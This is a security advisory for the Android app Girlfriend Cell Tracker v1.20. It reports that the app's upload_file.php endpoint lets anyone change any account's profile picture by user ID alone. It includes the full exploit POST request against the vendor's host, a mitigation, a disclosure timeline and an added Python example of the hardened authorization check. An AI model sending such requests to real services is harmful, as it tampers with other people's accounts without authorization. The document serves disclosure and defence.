SIK-2017-051
Title:
Profile picture of any account can be changed without authorization in Girlfriend Cell Tracker app
Report ID
SIK-2017-051
Summary:
- Vendor: SoftSquare InfoSoft
- Product: Girlfriend Cell Tracker (Package-Name: com.omrup.cell.tracker)
- Affected Version: v1.20
- Severity: Low
- Short summary: Knowing only the user ID of an account (which can be leaked via SIK-2017-047), the profile picture of that account can be changed.
Details:
By sending the POST request
POST /****/api/upload_file.php HTTP/1.1
Content-Type: multipart/form-data; boundary=77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Length: 16468
Host: omsquare.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.4.0
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="file"; filename="cropped1506604715.jpg"
Content-Type: text/csv
Content-Length: 16134
[PICTURE DATA IN BINARY]
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="id"
Content-Length: 15
149865712068829 [USER ID TO CHANGE PROFILE PICTURE FOR]
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2--
the picture is uploaded and set as the profile picture of the user ID given in the "id" field. The request carries no authentication, so the caller does not need to own that account.
All user IDs can be extracted via SIK-2017-047.
Workaround
None.
Suggested Mitigation
Require authentication for profile picture uploads, so that a user can only change their own profile picture.
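The following is an added example, not code from the advisory or the vendor: it parses a multipart body shaped like the request in the Details section and shows the server-side decision the mitigation calls for, where the target account is taken from the authenticated session and the client-supplied "id" field is only compared against it. The boundary and user ID are reused from the advisory; the session lookup, JPEG bytes and function names are constructed stand-ins.

```python
import re

# Constructed stand-ins: the advisory's boundary and user id, plus a fake JPEG header.
BOUNDARY = "77a6d0f9-460d-42f4-8dc2-79280f16c0f2"
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16

def build_body(user_id: str, picture: bytes) -> bytes:
    """Constructed request body with the same two parts the app sends."""
    d = b"--" + BOUNDARY.encode()
    return b"\r\n".join([
        d, b'Content-Disposition: form-data; name="file"; filename="cropped1506604715.jpg"',
        b"Content-Type: text/csv", b"", picture,  # app declares text/csv for a JPEG
        d, b'Content-Disposition: form-data; name="id"', b"", user_id.encode(),
        d + b"--", b""])

def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: {name: (filename, content_type, data)}."""
    fields = {}
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.strip() in (b"", b"--"):
            continue                      # closing delimiter / epilogue
        head, _, data = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]              # CRLF before the next boundary is not content
        headers = head.decode("latin-1")
        name = re.search(r'\bname="([^"]*)"', headers).group(1)
        fname = re.search(r'filename="([^"]*)"', headers)
        ctype = re.search(r"Content-Type:\s*(\S+)", headers, re.I)
        fields[name] = (fname and fname.group(1), ctype and ctype.group(1), data)
    return fields

def authorize_upload(session_user, form: dict):
    """Server-side decision for an upload_file.php-style handler.
    Vulnerable pattern (the advisory): target = form['id'] with no session, so any
    caller overwrites any account. Hardened: target comes only from the session."""
    if session_user is None:
        return 401, "login required"
    if "file" not in form or "id" not in form:
        return 400, "missing field"
    if form["id"][2].decode().strip() != session_user:
        return 403, "id does not match authenticated user"
    if not form["file"][2].startswith(b"\xff\xd8\xff"):
        return 415, "file is not a JPEG"  # check magic bytes, not the declared type
    return 200, "picture updated for " + session_user

if __name__ == "__main__":
    body = build_body("149865712068829", FAKE_JPEG)
    print(authorize_upload(None, parse_multipart(body, BOUNDARY)))              # (401, ...)
    print(authorize_upload("149865712068829", parse_multipart(body, BOUNDARY)))  # (200, ...)
```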
Timeline
- 2017-08-23: Vulnerability discovered
- 2017-08-29: First email sent to developer
- 2018-08-11: Published